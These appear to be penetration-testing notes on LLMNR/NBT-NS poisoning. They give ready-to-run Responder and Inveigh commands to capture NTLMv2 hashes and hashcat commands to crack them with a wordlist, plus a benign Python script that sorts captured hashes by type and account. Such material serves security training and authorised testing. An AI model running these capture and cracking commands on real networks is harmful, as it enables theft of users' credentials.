
Captured NTLMv2 hash

From Linux


sudo responder -I ens224 

We should start Responder and let it run for a while in a tmux window while we perform other enumeration tasks to maximize the number of hashes that we can obtain. Once we are ready, we can pass these hashes to Hashcat using hash mode 5600 for NTLMv2 hashes that we typically obtain with Responder. We may at times obtain NTLMv1 hashes and other types of hashes, and can consult the Hashcat example hashes page to identify them and find the proper hash mode. If we ever obtain a strange or unknown hash, this site is a great reference to help identify it.

Cracking an NTLMv2 Hash With Hashcat

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt 
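Before choosing a hash mode, it helps to sort a capture file by type and by account. The following is an added example, not part of the original notes or of Responder, Inveigh or Hashcat: it recognizes the NetNTLMv2 (mode 5600) and NetNTLMv1 (mode 5500) line layouts and keeps one entry per account, which also gives the list of exposed accounts for reporting. The domain `CORP`, the account `svc_legacy` and all hex values are constructed placeholders.

```python
import re
from collections import defaultdict

HEX = r"[0-9a-fA-F]"
# user::domain:server_challenge:NTProofStr:blob          -> hashcat mode 5600
NTLMV2 = re.compile(rf"^([^:]*)::([^:]*):{HEX}{{16}}:{HEX}{{32}}:{HEX}{{2,}}$")
# user::domain:LM_response:NT_response:server_challenge  -> hashcat mode 5500
NTLMV1 = re.compile(rf"^([^:]*)::([^:]*):{HEX}{{48}}:{HEX}{{48}}:{HEX}{{16}}$")


def classify(line):
    """Return (hashcat_mode, user, domain), or None if the line is not recognized."""
    line = line.strip()
    for mode, pattern in ((5600, NTLMV2), (5500, NTLMV1)):
        match = pattern.match(line)
        if match:
            return mode, match.group(1), match.group(2)
    return None


def triage(lines):
    """Group captures by mode, keeping the first line seen per (DOMAIN, USER)."""
    by_mode = defaultdict(dict)
    unknown = []
    for line in lines:
        if not line.strip():
            continue
        hit = classify(line)
        if hit is None:
            unknown.append(line.strip())  # needs manual identification
            continue
        mode, user, domain = hit
        by_mode[mode].setdefault((domain.upper(), user.upper()), line.strip())
    return dict(by_mode), unknown


# Constructed sample input: placeholder hex, not real captures.
SAMPLE = [
    "forend::CORP:1122334455667788:" + "ab" * 16 + ":0101000000000000" + "cd" * 20,
    "FOREND::corp:8877665544332211:" + "12" * 16 + ":0101000000000000" + "34" * 20,
    "svc_legacy::CORP:" + "00" * 24 + ":" + "ef" * 24 + ":1122334455667788",
    "[*] some tool status line that is not a hash",
]

if __name__ == "__main__":
    grouped, unknown = triage(SAMPLE)
    for mode, accounts in sorted(grouped.items()):
        print(mode, sorted(accounts))
    print("unrecognized:", unknown)
```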

From Windows


Inveigh - PowerShell version

Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

InveighZero - C# version

# Run PowerShell as Administrator
.\Inveigh.exe -Sniffer N
> Press ESC to enter/exit interactive console
>> HELP
>> GET NTLMV2UNIQUE
>> GET NTLMV2USERNAMES

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Tools


Tool         Description
Responder    Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.
Inveigh      Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.
Metasploit   Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.